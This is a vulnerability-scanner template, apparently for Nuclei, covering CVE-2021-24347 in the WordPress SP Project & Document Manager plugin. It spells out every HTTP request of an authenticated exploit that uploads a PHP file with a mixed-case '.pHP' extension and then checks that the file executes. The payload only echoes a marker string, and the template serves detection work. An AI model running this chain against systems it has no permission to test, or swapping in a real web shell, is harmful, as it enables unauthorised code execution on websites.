id: CVE-2021-24347

info:
  name: WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload
  author: theamanrawat
  severity: high
  description: |
    WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP.
  reference:
    - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
    - https://wordpress.org/plugins/sp-client-document-manager/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24347
    - http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html
  remediation: Fixed in version 4.22.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-24347
    cwe-id: CWE-178
    cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:*:*:*
    epss-score: 0.94776
  metadata:
    max-request: 4
    verified: true
  tags: sp-client-document-manager,wpscan,cve,wp-plugin,wp,authenticated,wordpress,cve2021,rce,packetstorm

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy

        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="cdm_upload_file_field"

        {{nonce}}
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="_wp_http_referer"

        /wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-name"


        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
        Content-Type: application/octet-stream


        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
        Content-Type: image/svg+xml

        <?php

        echo "CVE-2021-24347";

        ?>
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-notes"


        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="sp-cdm-community-upload"

        Upload
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--


      - |
        GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(header_4, "text/html")
          - status_code_4 == 200
          - contains(body_4, "CVE-2021-24347")
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"'
        internal: true

# Enhanced by md on 2023/03/21